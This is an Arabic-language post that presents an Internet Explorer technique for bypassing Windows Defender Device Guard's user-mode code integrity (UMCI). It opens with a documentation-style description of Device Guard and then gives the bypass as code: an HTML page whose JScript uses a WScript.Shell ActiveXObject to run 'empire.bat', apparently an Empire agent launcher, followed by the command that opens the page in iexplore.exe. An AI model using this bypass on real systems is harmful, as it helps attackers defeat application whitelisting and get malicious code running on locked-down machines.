
تجاوز ميزة UMCI في Internet Explorer
Windows Defender Device Guard هو مزيج من ميزات الأمان المتعلقة بالأجهزة والبرامج على مستوى المؤسسات، والتي عند تهيئتها معًا ستقوم بقفل الجهاز بحيث يمكنه فقط تشغيل التطبيقات الموثوقة التي تحددها في سياسات سلامة الكود الخاصة بك. إذا لم يكن التطبيق موثوقًا، فلن يتمكن من التشغيل، نقطة. مع الأجهزة التي تلبي المتطلبات الأساسية، فهذا يعني أيضًا أنه حتى إذا تمكن المهاجم من السيطرة على نواة Windows، فستكون فرصته في تشغيل كود قابل للتنفيذ ضار أقل بكثير. مع الأجهزة المناسبة، يمكن لـ Windows Defender Device Guard استخدام الميزة الجديدة للأمان القائم على المحاكاة الافتراضية في Windows 10 (المتاحة في إصدارات Enterprise و Education لأجهزة سطح المكتب وفي جميع إصدارات Server) لعزل خدمة سلامة الكود عن نواة Microsoft Windows نفسها. في هذه الحالة، تعمل خدمة سلامة الكود جنبًا إلى جنب مع النواة في حاوية محمية بواسطة برنامج hypervisor الخاص بنظام Windows. يشرح هذا الدليل الميزات الفردية في Windows Defender Device Guard بالإضافة إلى كيفية التخطيط لها، وتكوينها، ونشرها. ويتضمن:
يمنع UMCI تنفيذ الثنائيات غير المعتمدة، ويقيد Windows Scripting Host، ويضع PowerShell في وضع اللغة المقيدة. يجعل هذا الحصول على تنفيذ الكود على النظام أمرًا صعبًا إلى حد ما. هذا المنشور سيستمر
======================================================================||>
لنقم بعرض تجاوز الكود
======================================================================||>
<html>
<body>
<script type="text/jscript">
var r = new ActiveXObject("WScript.Shell").Run("empire.bat");
</script>
</body>
</html>
======================================================================||>
PS:> C:\Users\Homjxie> cmd /C "C:\Program Files\Internet Explorer\iexplore.exe " "C:\Users\Homjxie\Desktop\Homjxie.html"
======================================================================||>

======================================================================||> ======================================================================||>